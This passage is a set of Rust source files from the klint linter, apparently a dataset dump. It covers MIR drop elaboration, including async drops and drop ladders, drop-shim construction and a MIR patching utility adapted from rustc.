})) => (*impl_def_id, *args),
impl_source => {
span_bug!(span, "invalid `AsyncDrop` impl_source: {:?}", impl_source);
}
};
// impl_item_refs may be empty if drop fn is not implemented in 'impl AsyncDrop for ...'
// (#140974).
// Such code will report error, so just generate sync drop here and return
let Some(drop_fn_def_id) = tcx
.associated_item_def_ids(drop_trait)
.first()
.and_then(|def_id| {
if tcx.def_kind(def_id) == DefKind::AssocFn
&& tcx.check_args_compatible(*def_id, trait_args)
{
Some(def_id)
} else {
None
}
})
.copied()
else {
tcx.dcx().span_delayed_bug(
self.elaborator.body().span,
"AsyncDrop type without correct `async fn drop(...)`.",
);
self.elaborator.patch().patch_terminator(
pin_obj_bb,
TerminatorKind::Drop {
place,
target: succ,
unwind: unwind.into_action(),
replace: false,
drop: None,
async_fut: None,
},
);
return pin_obj_bb;
};
let drop_fn = Ty::new_fn_def(tcx, drop_fn_def_id, trait_args);
let sig = drop_fn.fn_sig(tcx);
let sig = tcx.instantiate_bound_regions_with_erased(sig);
(sig.output(), drop_fn_def_id, trait_args)
} else {
// Resolving async_drop_in_place<T> function for drop_ty
let drop_fn_def_id = tcx.require_lang_item(LangItem::AsyncDropInPlace, span);
let trait_args = tcx.mk_args(&[drop_ty.into()]);
let sig = tcx.fn_sig(drop_fn_def_id).instantiate(tcx, trait_args);
let sig = tcx.instantiate_bound_regions_with_erased(sig);
(sig.output(), drop_fn_def_id, trait_args)
};
let fut = Place::from(self.new_temp(fut_ty));
// #1:pin_obj_bb >>> obj_ref = &mut obj
let obj_ref_ty = Ty::new_mut_ref(tcx, tcx.lifetimes.re_erased, drop_ty);
let obj_ref_place = Place::from(self.new_temp(obj_ref_ty));
let term_loc = self.elaborator.terminator_loc(pin_obj_bb);
self.elaborator.patch().add_assign(
term_loc,
obj_ref_place,
Rvalue::Ref(
tcx.lifetimes.re_erased,
BorrowKind::Mut {
kind: MutBorrowKind::Default,
},
place,
),
);
// pin_obj_place preparation
let pin_obj_new_unchecked_fn = Ty::new_fn_def(
tcx,
tcx.require_lang_item(LangItem::PinNewUnchecked, span),
[GenericArg::from(obj_ref_ty)],
);
let pin_obj_ty = pin_obj_new_unchecked_fn
.fn_sig(tcx)
.output()
.no_bound_vars()
.unwrap();
let pin_obj_place = Place::from(self.new_temp(pin_obj_ty));
let pin_obj_new_unchecked_fn = Operand::Constant(Box::new(ConstOperand {
span,
user_ty: None,
const_: Const::zero_sized(pin_obj_new_unchecked_fn),
}));
// #3:drop_term_bb
let drop_term_bb = self.new_block(
unwind,
TerminatorKind::Drop {
place,
target: succ,
unwind: unwind.into_action(),
replace: false,
drop: dropline,
async_fut: Some(fut.local),
},
);
// #2:call_drop_bb
let mut call_statements = Vec::new();
let drop_arg = if call_destructor_only {
pin_obj_place
} else {
let ty::Adt(adt_def, adt_args) = pin_obj_ty.kind() else {
bug!();
};
let obj_ptr_ty = Ty::new_mut_ptr(tcx, drop_ty);
let unwrap_ty = adt_def.non_enum_variant().fields[FieldIdx::ZERO].ty(tcx, adt_args);
let obj_ref_place = Place::from(self.new_temp(unwrap_ty));
call_statements.push(self.assign(
obj_ref_place,
Rvalue::Use(Operand::Copy(tcx.mk_place_field(
pin_obj_place,
FieldIdx::ZERO,
unwrap_ty,
))),
));
let obj_ptr_place = Place::from(self.new_temp(obj_ptr_ty));
let addr = Rvalue::RawPtr(RawPtrKind::Mut, tcx.mk_place_deref(obj_ref_place));
call_statements.push(self.assign(obj_ptr_place, addr));
obj_ptr_place
};
call_statements.push(Statement::new(
self.source_info,
StatementKind::StorageLive(fut.local),
));
let call_drop_bb = self.new_block_with_statements(
unwind,
call_statements,
TerminatorKind::Call {
func: Operand::function_handle(tcx, drop_fn_def_id, trait_args, span),
args: [Spanned {
node: Operand::Move(drop_arg),
span: DUMMY_SP,
}]
.into(),
destination: fut,
target: Some(drop_term_bb),
unwind: unwind.into_action(),
call_source: CallSource::Misc,
fn_span: self.source_info.span,
},
);
// StorageDead(fut) in self.succ block (at the begin)
self.elaborator.patch().add_statement(
Location {
block: self.succ,
statement_index: 0,
},
StatementKind::StorageDead(fut.local),
);
// StorageDead(fut) in unwind block (at the begin)
if let Unwind::To(block) = unwind {
self.elaborator.patch().add_statement(
Location {
block,
statement_index: 0,
},
StatementKind::StorageDead(fut.local),
);
}
// StorageDead(fut) in dropline block (at the begin)
if let Some(block) = dropline {
self.elaborator.patch().add_statement(
Location {
block,
statement_index: 0,
},
StatementKind::StorageDead(fut.local),
);
}
// #1:pin_obj_bb >>> call Pin<ObjTy>::new_unchecked(&mut obj)
self.elaborator.patch().patch_terminator(
pin_obj_bb,
TerminatorKind::Call {
func: pin_obj_new_unchecked_fn,
args: [dummy_spanned(Operand::Move(obj_ref_place))].into(),
destination: pin_obj_place,
target: Some(call_drop_bb),
unwind: unwind.into_action(),
call_source: CallSource::Misc,
fn_span: span,
},
);
pin_obj_bb
}
fn build_drop(&mut self, bb: BasicBlock) {
let drop_ty = self.place_ty(self.place);
if self.tcx().features().async_drop()
&& self.elaborator.body().coroutine.is_some()
&& self.elaborator.allow_async_drops()
&& !self
.elaborator
.patch_ref()
.block(self.elaborator.body(), bb)
.is_cleanup
&& drop_ty.needs_async_drop(self.tcx(), self.elaborator.typing_env())
{
self.build_async_drop(
self.place,
drop_ty,
Some(bb),
self.succ,
self.unwind,
self.dropline,
false,
);
} else {
self.elaborator.patch().patch_terminator(
bb,
TerminatorKind::Drop {
place: self.place,
target: self.succ,
unwind: self.unwind.into_action(),
replace: false,
drop: None,
async_fut: None,
},
);
}
}
/// This elaborates a single drop instruction, located at `bb`, and
/// patches over it.
///
/// The elaborated drop checks the drop flags to only drop what
/// is initialized.
///
/// In addition, the relevant drop flags also need to be cleared
/// to avoid double-drops. However, in the middle of a complex
/// drop, one must avoid clearing some of the flags before they
/// are read, as that would cause a memory leak.
///
/// In particular, when dropping an ADT, multiple fields may be
/// joined together under the `rest` subpath. They are all controlled
/// by the primary drop flag, but only the last rest-field dropped
/// should clear it (and it must also not clear anything else).
//
// FIXME: I think we should just control the flags externally,
// and then we do not need this machinery.
#[instrument(level = "debug")]
fn elaborate_drop(&mut self, bb: BasicBlock) {
match self.elaborator.drop_style(self.path, DropFlagMode::Deep) {
DropStyle::Dead => {
self.elaborator
.patch()
.patch_terminator(bb, TerminatorKind::Goto { target: self.succ });
}
DropStyle::Static => {
self.build_drop(bb);
}
DropStyle::Conditional => {
let drop_bb = self.complete_drop(self.succ, self.unwind);
self.elaborator
.patch()
.patch_terminator(bb, TerminatorKind::Goto { target: drop_bb });
}
DropStyle::Open => {
let drop_bb = self.open_drop();
self.elaborator
.patch()
.patch_terminator(bb, TerminatorKind::Goto { target: drop_bb });
}
}
}
/// Returns the place and move path for each field of `variant`,
/// (the move path is `None` if the field is a rest field).
fn move_paths_for_fields(
&self,
base_place: Place<'tcx>,
variant_path: D::Path,
variant: &'tcx ty::VariantDef,
args: GenericArgsRef<'tcx>,
) -> Vec<(Place<'tcx>, Option<D::Path>)> {
variant
.fields
.iter_enumerated()
.map(|(field_idx, field)| {
let subpath = self.elaborator.field_subpath(variant_path, field_idx);
let tcx = self.tcx();
assert_eq!(
self.elaborator.typing_env().typing_mode,
ty::TypingMode::PostAnalysis
);
let field_ty = match tcx.try_normalize_erasing_regions(
self.elaborator.typing_env(),
field.ty(tcx, args),
) {
Ok(t) => t,
Err(_) => Ty::new_error(
self.tcx(),
self.tcx().dcx().span_delayed_bug(
self.elaborator.body().span,
"Error normalizing in drop elaboration.",
),
),
};
(tcx.mk_place_field(base_place, field_idx, field_ty), subpath)
})
.collect()
}
fn drop_subpath(
&mut self,
place: Place<'tcx>,
path: Option<D::Path>,
succ: BasicBlock,
unwind: Unwind,
dropline: Option<BasicBlock>,
) -> BasicBlock {
if let Some(path) = path {
debug!("drop_subpath: for std field {:?}", place);
DropCtxt {
elaborator: self.elaborator,
source_info: self.source_info,
path,
place,
succ,
unwind,
dropline,
}
.elaborated_drop_block()
} else {
debug!("drop_subpath: for rest field {:?}", place);
DropCtxt {
elaborator: self.elaborator,
source_info: self.source_info,
place,
succ,
unwind,
dropline,
// Using `self.path` here to condition the drop on
// our own drop flag.
path: self.path,
}
.complete_drop(succ, unwind)
}
}
/// Creates one-half of the drop ladder for a list of fields, and return
/// the list of steps in it in reverse order, with the first step
/// dropping 0 fields and so on.
///
/// `unwind_ladder` is such a list of steps in reverse order,
/// which is called if the matching step of the drop glue panics.
///
/// `dropline_ladder` is a similar list of steps in reverse order,
/// which is called if the matching step of the drop glue will contain async drop
/// (expanded later to Yield) and the containing coroutine will be dropped at this point.
fn drop_halfladder(
&mut self,
unwind_ladder: &[Unwind],
dropline_ladder: &[Option<BasicBlock>],
mut succ: BasicBlock,
fields: &[(Place<'tcx>, Option<D::Path>)],
) -> Vec<BasicBlock> {
iter::once(succ)
.chain(
itertools::izip!(fields.iter().rev(), unwind_ladder, dropline_ladder).map(
|(&(place, path), &unwind_succ, &dropline_to)| {
succ = self.drop_subpath(place, path, succ, unwind_succ, dropline_to);
succ
},
),
)
.collect()
}
fn drop_ladder_bottom(&mut self) -> (BasicBlock, Unwind, Option<BasicBlock>) {
// Clear the "master" drop flag at the end. This is needed
// because the "master" drop protects the ADT's discriminant,
// which is invalidated after the ADT is dropped.
(
self.drop_flag_reset_block(DropFlagMode::Shallow, self.succ, self.unwind),
self.unwind,
self.dropline,
)
}
/// Creates a full drop ladder, consisting of 2 connected half-drop-ladders
///
/// For example, with 3 fields, the drop ladder is
///
/// ```text
/// .d0:
/// ELAB(drop location.0 [target=.d1, unwind=.c1])
/// .d1:
/// ELAB(drop location.1 [target=.d2, unwind=.c2])
/// .d2:
/// ELAB(drop location.2 [target=`self.succ`, unwind=`self.unwind`])
/// .c1:
/// ELAB(drop location.1 [target=.c2])
/// .c2:
/// ELAB(drop location.2 [target=`self.unwind`])
/// ```
///
/// For possible-async drops in coroutines we also need dropline ladder
/// ```text
/// .d0 (mainline):
/// ELAB(drop location.0 [target=.d1, unwind=.c1, drop=.e1])
/// .d1 (mainline):
/// ELAB(drop location.1 [target=.d2, unwind=.c2, drop=.e2])
/// .d2 (mainline):
/// ELAB(drop location.2 [target=`self.succ`, unwind=`self.unwind`, drop=`self.drop`])
/// .c1 (unwind):
/// ELAB(drop location.1 [target=.c2])
/// .c2 (unwind):
/// ELAB(drop location.2 [target=`self.unwind`])
/// .e1 (dropline):
/// ELAB(drop location.1 [target=.e2, unwind=.c2])
/// .e2 (dropline):
/// ELAB(drop location.2 [target=`self.drop`, unwind=`self.unwind`])
/// ```
///
/// NOTE: this does not clear the master drop flag, so you need
/// to point succ/unwind on a `drop_ladder_bottom`.
fn drop_ladder(
&mut self,
fields: Vec<(Place<'tcx>, Option<D::Path>)>,
succ: BasicBlock,
unwind: Unwind,
dropline: Option<BasicBlock>,
) -> (BasicBlock, Unwind, Option<BasicBlock>) {
debug!("drop_ladder({:?}, {:?})", self, fields);
assert!(
if unwind.is_cleanup() {
dropline.is_none()
} else {
true
},
"Dropline is set for cleanup drop ladder"
);
let mut fields = fields;
fields.retain(|&(place, _)| {
self.place_ty(place)
.needs_drop(self.tcx(), self.elaborator.typing_env())
});
debug!("drop_ladder - fields needing drop: {:?}", fields);
let dropline_ladder: Vec<Option<BasicBlock>> = vec![None; fields.len() + 1];
let unwind_ladder = vec![Unwind::InCleanup; fields.len() + 1];
let unwind_ladder: Vec<_> = if let Unwind::To(target) = unwind {
let halfladder =
self.drop_halfladder(&unwind_ladder, &dropline_ladder, target, &fields);
halfladder.into_iter().map(Unwind::To).collect()
} else {
unwind_ladder
};
let dropline_ladder: Vec<_> = if let Some(succ) = dropline {
let halfladder = self.drop_halfladder(&unwind_ladder, &dropline_ladder, succ, &fields);
halfladder.into_iter().map(Some).collect()
} else {
dropline_ladder
};
let normal_ladder = self.drop_halfladder(&unwind_ladder, &dropline_ladder, succ, &fields);
(
*normal_ladder.last().unwrap(),
*unwind_ladder.last().unwrap(),
*dropline_ladder.last().unwrap(),
)
}
fn open_drop_for_tuple(&mut self, tys: &[Ty<'tcx>]) -> BasicBlock {
debug!("open_drop_for_tuple({:?}, {:?})", self, tys);
let fields = tys
.iter()
.enumerate()
.map(|(i, &ty)| {
(
self.tcx().mk_place_field(self.place, FieldIdx::new(i), ty),
self.elaborator.field_subpath(self.path, FieldIdx::new(i)),
)
})
.collect();
let (succ, unwind, dropline) = self.drop_ladder_bottom();
self.drop_ladder(fields, succ, unwind, dropline).0
}
/// Drops the T contained in a `Box<T>` if it has not been moved out of
#[instrument(level = "debug", ret)]
fn open_drop_for_box_contents(
&mut self,
adt: ty::AdtDef<'tcx>,
args: GenericArgsRef<'tcx>,
succ: BasicBlock,
unwind: Unwind,
dropline: Option<BasicBlock>,
) -> BasicBlock {
// drop glue is sent straight to codegen
// box cannot be directly dereferenced
let unique_ty = adt.non_enum_variant().fields[FieldIdx::ZERO].ty(self.tcx(), args);
let unique_variant = unique_ty.ty_adt_def().unwrap().non_enum_variant();
let nonnull_ty = unique_variant.fields[FieldIdx::ZERO].ty(self.tcx(), args);
let ptr_ty = Ty::new_imm_ptr(self.tcx(), args[0].expect_ty());
let unique_place = self
.tcx()
.mk_place_field(self.place, FieldIdx::ZERO, unique_ty);
let nonnull_place = self
.tcx()
.mk_place_field(unique_place, FieldIdx::ZERO, nonnull_ty);
let ptr_local = self.new_temp(ptr_ty);
let interior = self.tcx().mk_place_deref(Place::from(ptr_local));
let interior_path = self.elaborator.deref_subpath(self.path);
let do_drop_bb = self.drop_subpath(interior, interior_path, succ, unwind, dropline);
let setup_bbd = BasicBlockData::new_stmts(
vec![self.assign(
Place::from(ptr_local),
Rvalue::Cast(CastKind::Transmute, Operand::Copy(nonnull_place), ptr_ty),
)],
Some(Terminator {
kind: TerminatorKind::Goto { target: do_drop_bb },
source_info: self.source_info,
}),
unwind.is_cleanup(),
);
self.elaborator.patch().new_block(setup_bbd)
}
#[instrument(level = "debug", ret)]
fn open_drop_for_adt(
&mut self,
adt: ty::AdtDef<'tcx>,
args: GenericArgsRef<'tcx>,
) -> BasicBlock {
if adt.variants().is_empty() {
return self.elaborator.patch().new_block(BasicBlockData::new(
Some(Terminator {
source_info: self.source_info,
kind: TerminatorKind::Unreachable,
}),
self.unwind.is_cleanup(),
));
}
let skip_contents = adt.is_union() || adt.is_manually_drop();
let contents_drop = if skip_contents {
if adt.has_dtor(self.tcx()) && self.elaborator.get_drop_flag(self.path).is_some() {
// the top-level drop flag is usually cleared by open_drop_for_adt_contents
// types with destructors would still need an empty drop ladder to clear it
//
// however, these types are only open dropped in `DropShimElaborator`
// which does not have drop flags
// a future box-like "DerefMove" trait would allow for this case to happen
span_bug!(self.source_info.span, "open dropping partially moved union");
}
(self.succ, self.unwind, self.dropline)
} else {
self.open_drop_for_adt_contents(adt, args)
};
if adt.has_dtor(self.tcx()) {
let destructor_block = if adt.is_box() {
// we need to drop the inside of the box before running the destructor
let succ = self.destructor_call_block_sync((contents_drop.0, contents_drop.1));
let unwind = contents_drop
.1
.map(|unwind| self.destructor_call_block_sync((unwind, Unwind::InCleanup)));
let dropline = contents_drop
.2
.map(|dropline| self.destructor_call_block_sync((dropline, contents_drop.1)));
self.open_drop_for_box_contents(adt, args, succ, unwind, dropline)
} else {
self.destructor_call_block(contents_drop)
};
self.drop_flag_test_block(destructor_block, contents_drop.0, contents_drop.1)
} else {
contents_drop.0
}
}
fn open_drop_for_adt_contents(
&mut self,
adt: ty::AdtDef<'tcx>,
args: GenericArgsRef<'tcx>,
) -> (BasicBlock, Unwind, Option<BasicBlock>) {
let (succ, unwind, dropline) = self.drop_ladder_bottom();
if !adt.is_enum() {
let fields =
self.move_paths_for_fields(self.place, self.path, adt.variant(FIRST_VARIANT), args);
self.drop_ladder(fields, succ, unwind, dropline)
} else {
self.open_drop_for_multivariant(adt, args, succ, unwind, dropline)
}
}
fn open_drop_for_multivariant(
&mut self,
adt: ty::AdtDef<'tcx>,
args: GenericArgsRef<'tcx>,
succ: BasicBlock,
unwind: Unwind,
dropline: Option<BasicBlock>,
) -> (BasicBlock, Unwind, Option<BasicBlock>) {
let mut values = Vec::with_capacity(adt.variants().len());
let mut normal_blocks = Vec::with_capacity(adt.variants().len());
let mut unwind_blocks = if unwind.is_cleanup() {
None
} else {
Some(Vec::with_capacity(adt.variants().len()))
};
let mut dropline_blocks = if dropline.is_none() {
None
} else {
Some(Vec::with_capacity(adt.variants().len()))
};
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | true |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/mir/drop_shim.rs | src/mir/drop_shim.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
// From rustc_mir_transform/src/shim.rs
// Adopted to support polymorphic drop shims
use rustc_abi::{FieldIdx, VariantIdx};
use rustc_hir::def_id::DefId;
use rustc_index::{Idx, IndexVec};
use rustc_middle::mir::*;
use rustc_middle::ty::{self, EarlyBinder, Ty, TyCtxt, TypingEnv};
use rustc_span::Span;
use std::{fmt, iter};
use super::elaborate_drop::{self, *};
use super::patch::MirPatch;
use crate::ctxt::AnalysisCtxt;
fn local_decls_for_sig<'tcx>(
sig: &ty::FnSig<'tcx>,
span: Span,
) -> IndexVec<Local, LocalDecl<'tcx>> {
iter::once(LocalDecl::new(sig.output(), span))
.chain(
sig.inputs()
.iter()
.map(|ity| LocalDecl::new(*ity, span).immutable()),
)
.collect()
}
#[instrument(skip(cx))]
pub fn build_drop_shim<'tcx>(
cx: &AnalysisCtxt<'tcx>,
def_id: DefId,
typing_env: TypingEnv<'tcx>,
ty: Ty<'tcx>,
) -> Body<'tcx> {
if let ty::Coroutine(gen_def_id, args) = ty.kind() {
let body = cx.analysis_mir(*gen_def_id).coroutine_drop().unwrap();
let body = EarlyBinder::bind(body.clone()).instantiate(cx.tcx, args);
return body;
}
let args = cx.mk_args(&[ty.into()]);
let sig = cx.fn_sig(def_id).instantiate(cx.tcx, args);
let sig = cx.instantiate_bound_regions_with_erased(sig);
let span = cx.def_span(def_id);
let source_info = SourceInfo::outermost(span);
let return_block = BasicBlock::new(1);
let mut blocks = IndexVec::with_capacity(2);
let block = |blocks: &mut IndexVec<_, _>, kind| {
blocks.push(BasicBlockData::new(
Some(Terminator { source_info, kind }),
false,
))
};
block(
&mut blocks,
TerminatorKind::Goto {
target: return_block,
},
);
block(&mut blocks, TerminatorKind::Return);
let source = MirSource::from_instance(ty::InstanceKind::DropGlue(def_id, Some(ty)));
let mut body = new_body(
source,
blocks,
local_decls_for_sig(&sig, span),
sig.inputs().len(),
span,
);
// The first argument (index 0), but add 1 for the return value.
let dropee_ptr = Place::from(Local::new(1 + 0));
let patch = {
let mut elaborator = DropShimElaborator {
body: &body,
patch: MirPatch::new(&body),
tcx: cx.tcx,
typing_env,
produce_async_drops: false,
};
let dropee = cx.mk_place_deref(dropee_ptr);
let resume_block = elaborator.patch.resume_block();
elaborate_drop::elaborate_drop(
&mut elaborator,
source_info,
dropee,
(),
return_block,
elaborate_drop::Unwind::To(resume_block),
START_BLOCK,
None,
);
elaborator.patch
};
patch.apply(&mut body);
body
}
fn new_body<'tcx>(
source: MirSource<'tcx>,
basic_blocks: IndexVec<BasicBlock, BasicBlockData<'tcx>>,
local_decls: IndexVec<Local, LocalDecl<'tcx>>,
arg_count: usize,
span: Span,
) -> Body<'tcx> {
let mut body = Body::new(
source,
basic_blocks,
IndexVec::from_elem_n(
SourceScopeData {
span,
parent_scope: None,
inlined: None,
inlined_parent_scope: None,
local_data: ClearCrossCrate::Clear,
},
1,
),
local_decls,
IndexVec::new(),
arg_count,
vec![],
span,
None,
// FIXME(compiler-errors): is this correct?
None,
);
body.set_required_consts(Vec::new());
body
}
pub struct DropShimElaborator<'a, 'tcx> {
pub body: &'a Body<'tcx>,
pub patch: MirPatch<'tcx>,
pub tcx: TyCtxt<'tcx>,
pub typing_env: ty::TypingEnv<'tcx>,
pub produce_async_drops: bool,
}
impl fmt::Debug for DropShimElaborator<'_, '_> {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> Result<(), fmt::Error> {
f.debug_struct("DropShimElaborator").finish_non_exhaustive()
}
}
impl<'a, 'tcx> DropElaborator<'a, 'tcx> for DropShimElaborator<'a, 'tcx> {
type Path = ();
fn patch_ref(&self) -> &MirPatch<'tcx> {
&self.patch
}
fn patch(&mut self) -> &mut MirPatch<'tcx> {
&mut self.patch
}
fn body(&self) -> &'a Body<'tcx> {
self.body
}
fn tcx(&self) -> TyCtxt<'tcx> {
self.tcx
}
fn typing_env(&self) -> ty::TypingEnv<'tcx> {
self.typing_env
}
fn terminator_loc(&self, bb: BasicBlock) -> Location {
self.patch.terminator_loc(self.body, bb)
}
fn allow_async_drops(&self) -> bool {
self.produce_async_drops
}
fn drop_style(&self, _path: Self::Path, mode: DropFlagMode) -> DropStyle {
match mode {
DropFlagMode::Shallow => {
// Drops for the contained fields are "shallow" and "static" - they will simply call
// the field's own drop glue.
DropStyle::Static
}
DropFlagMode::Deep => {
// The top-level drop is "deep" and "open" - it will be elaborated to a drop ladder
// dropping each field contained in the value.
DropStyle::Open
}
}
}
fn get_drop_flag(&mut self, _path: Self::Path) -> Option<Operand<'tcx>> {
None
}
fn clear_drop_flag(&mut self, _location: Location, _path: Self::Path, _mode: DropFlagMode) {}
fn field_subpath(&self, _path: Self::Path, _field: FieldIdx) -> Option<Self::Path> {
None
}
fn deref_subpath(&self, _path: Self::Path) -> Option<Self::Path> {
None
}
fn downcast_subpath(&self, _path: Self::Path, _variant: VariantIdx) -> Option<Self::Path> {
Some(())
}
fn array_subpath(&self, _path: Self::Path, _index: u64, _size: u64) -> Option<Self::Path> {
None
}
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/mir/patch.rs | src/mir/patch.rs | #![allow(dead_code)]
// From rustc_mir_transform/src/patch.rs
// Needed because they're `pub(crate)`
use rustc_index::{Idx, IndexVec};
use rustc_middle::mir::*;
use rustc_middle::ty::Ty;
use rustc_span::Span;
use tracing::debug;
/// This struct lets you "patch" a MIR body, i.e. modify it. You can queue up
/// various changes, such as the addition of new statements and basic blocks
/// and replacement of terminators, and then apply the queued changes all at
/// once with `apply`. This is useful for MIR transformation passes.
pub(crate) struct MirPatch<'tcx> {
term_patch_map: IndexVec<BasicBlock, Option<TerminatorKind<'tcx>>>,
new_blocks: Vec<BasicBlockData<'tcx>>,
new_statements: Vec<(Location, StatementKind<'tcx>)>,
new_locals: Vec<LocalDecl<'tcx>>,
resume_block: Option<BasicBlock>,
// Only for unreachable in cleanup path.
unreachable_cleanup_block: Option<BasicBlock>,
// Only for unreachable not in cleanup path.
unreachable_no_cleanup_block: Option<BasicBlock>,
// Cached block for UnwindTerminate (with reason)
terminate_block: Option<(BasicBlock, UnwindTerminateReason)>,
body_span: Span,
next_local: usize,
}
impl<'tcx> MirPatch<'tcx> {
/// Creates a new, empty patch.
pub(crate) fn new(body: &Body<'tcx>) -> Self {
let mut result = MirPatch {
term_patch_map: IndexVec::from_elem(None, &body.basic_blocks),
new_blocks: vec![],
new_statements: vec![],
new_locals: vec![],
next_local: body.local_decls.len(),
resume_block: None,
unreachable_cleanup_block: None,
unreachable_no_cleanup_block: None,
terminate_block: None,
body_span: body.span,
};
for (bb, block) in body.basic_blocks.iter_enumerated() {
// Check if we already have a resume block
if matches!(block.terminator().kind, TerminatorKind::UnwindResume)
&& block.statements.is_empty()
{
result.resume_block = Some(bb);
continue;
}
// Check if we already have an unreachable block
if matches!(block.terminator().kind, TerminatorKind::Unreachable)
&& block.statements.is_empty()
{
if block.is_cleanup {
result.unreachable_cleanup_block = Some(bb);
} else {
result.unreachable_no_cleanup_block = Some(bb);
}
continue;
}
// Check if we already have a terminate block
if let TerminatorKind::UnwindTerminate(reason) = block.terminator().kind
&& block.statements.is_empty()
{
result.terminate_block = Some((bb, reason));
continue;
}
}
result
}
pub(crate) fn resume_block(&mut self) -> BasicBlock {
if let Some(bb) = self.resume_block {
return bb;
}
let bb = self.new_block(BasicBlockData::new(
Some(Terminator {
source_info: SourceInfo::outermost(self.body_span),
kind: TerminatorKind::UnwindResume,
}),
true,
));
self.resume_block = Some(bb);
bb
}
pub(crate) fn unreachable_cleanup_block(&mut self) -> BasicBlock {
if let Some(bb) = self.unreachable_cleanup_block {
return bb;
}
let bb = self.new_block(BasicBlockData::new(
Some(Terminator {
source_info: SourceInfo::outermost(self.body_span),
kind: TerminatorKind::Unreachable,
}),
true,
));
self.unreachable_cleanup_block = Some(bb);
bb
}
pub(crate) fn unreachable_no_cleanup_block(&mut self) -> BasicBlock {
if let Some(bb) = self.unreachable_no_cleanup_block {
return bb;
}
let bb = self.new_block(BasicBlockData::new(
Some(Terminator {
source_info: SourceInfo::outermost(self.body_span),
kind: TerminatorKind::Unreachable,
}),
false,
));
self.unreachable_no_cleanup_block = Some(bb);
bb
}
pub(crate) fn terminate_block(&mut self, reason: UnwindTerminateReason) -> BasicBlock {
if let Some((cached_bb, cached_reason)) = self.terminate_block
&& reason == cached_reason
{
return cached_bb;
}
let bb = self.new_block(BasicBlockData::new(
Some(Terminator {
source_info: SourceInfo::outermost(self.body_span),
kind: TerminatorKind::UnwindTerminate(reason),
}),
true,
));
self.terminate_block = Some((bb, reason));
bb
}
/// Has a replacement of this block's terminator been queued in this patch?
pub(crate) fn is_term_patched(&self, bb: BasicBlock) -> bool {
self.term_patch_map[bb].is_some()
}
/// Universal getter for block data, either it is in 'old' blocks or in patched ones
pub(crate) fn block<'a>(
&'a self,
body: &'a Body<'tcx>,
bb: BasicBlock,
) -> &'a BasicBlockData<'tcx> {
match bb.index().checked_sub(body.basic_blocks.len()) {
Some(new) => &self.new_blocks[new],
None => &body[bb],
}
}
pub(crate) fn terminator_loc(&self, body: &Body<'tcx>, bb: BasicBlock) -> Location {
let offset = self.block(body, bb).statements.len();
Location {
block: bb,
statement_index: offset,
}
}
/// Queues the addition of a new temporary with additional local info.
pub(crate) fn new_local_with_info(
&mut self,
ty: Ty<'tcx>,
span: Span,
local_info: LocalInfo<'tcx>,
) -> Local {
let index = self.next_local;
self.next_local += 1;
let mut new_decl = LocalDecl::new(ty, span);
**new_decl.local_info.as_mut().unwrap_crate_local() = local_info;
self.new_locals.push(new_decl);
Local::new(index)
}
/// Queues the addition of a new temporary.
pub(crate) fn new_temp(&mut self, ty: Ty<'tcx>, span: Span) -> Local {
let index = self.next_local;
self.next_local += 1;
self.new_locals.push(LocalDecl::new(ty, span));
Local::new(index)
}
/// Returns the type of a local that's newly-added in the patch.
pub(crate) fn local_ty(&self, local: Local) -> Ty<'tcx> {
let local = local.as_usize();
assert!(local < self.next_local);
let new_local_idx = self.new_locals.len() - (self.next_local - local);
self.new_locals[new_local_idx].ty
}
/// Queues the addition of a new basic block.
pub(crate) fn new_block(&mut self, data: BasicBlockData<'tcx>) -> BasicBlock {
let block = BasicBlock::new(self.term_patch_map.len());
debug!("MirPatch: new_block: {:?}: {:?}", block, data);
self.new_blocks.push(data);
self.term_patch_map.push(None);
block
}
/// Queues the replacement of a block's terminator.
pub(crate) fn patch_terminator(&mut self, block: BasicBlock, new: TerminatorKind<'tcx>) {
assert!(self.term_patch_map[block].is_none());
debug!("MirPatch: patch_terminator({:?}, {:?})", block, new);
self.term_patch_map[block] = Some(new);
}
/// Queues the insertion of a statement at a given location. The statement
/// currently at that location, and all statements that follow, are shifted
/// down. If multiple statements are queued for addition at the same
/// location, the final statement order after calling `apply` will match
/// the queue insertion order.
///
/// E.g. if we have `s0` at location `loc` and do these calls:
///
/// p.add_statement(loc, s1);
/// p.add_statement(loc, s2);
/// p.apply(body);
///
/// then the final order will be `s1, s2, s0`, with `s1` at `loc`.
pub(crate) fn add_statement(&mut self, loc: Location, stmt: StatementKind<'tcx>) {
debug!("MirPatch: add_statement({:?}, {:?})", loc, stmt);
self.new_statements.push((loc, stmt));
}
/// Like `add_statement`, but specialized for assignments.
pub(crate) fn add_assign(&mut self, loc: Location, place: Place<'tcx>, rv: Rvalue<'tcx>) {
self.add_statement(loc, StatementKind::Assign(Box::new((place, rv))));
}
/// Applies the queued changes.
pub(crate) fn apply(self, body: &mut Body<'tcx>) {
debug!(
"MirPatch: {:?} new temps, starting from index {}: {:?}",
self.new_locals.len(),
body.local_decls.len(),
self.new_locals
);
debug!(
"MirPatch: {} new blocks, starting from index {}",
self.new_blocks.len(),
body.basic_blocks.len()
);
let bbs = if self.term_patch_map.is_empty() && self.new_blocks.is_empty() {
body.basic_blocks.as_mut_preserves_cfg()
} else {
body.basic_blocks.as_mut()
};
bbs.extend(self.new_blocks);
body.local_decls.extend(self.new_locals);
for (src, patch) in self.term_patch_map.into_iter_enumerated() {
if let Some(patch) = patch {
debug!("MirPatch: patching block {:?}", src);
bbs[src].terminator_mut().kind = patch;
}
}
let mut new_statements = self.new_statements;
// This must be a stable sort to provide the ordering described in the
// comment for `add_statement`.
new_statements.sort_by_key(|s| s.0);
let mut delta = 0;
let mut last_bb = START_BLOCK;
for (mut loc, stmt) in new_statements {
if loc.block != last_bb {
delta = 0;
last_bb = loc.block;
}
debug!(
"MirPatch: adding statement {:?} at loc {:?}+{}",
stmt, loc, delta
);
loc.statement_index += delta;
let source_info = Self::source_info_for_index(&body[loc.block], loc);
body[loc.block]
.statements
.insert(loc.statement_index, Statement::new(source_info, stmt));
delta += 1;
}
}
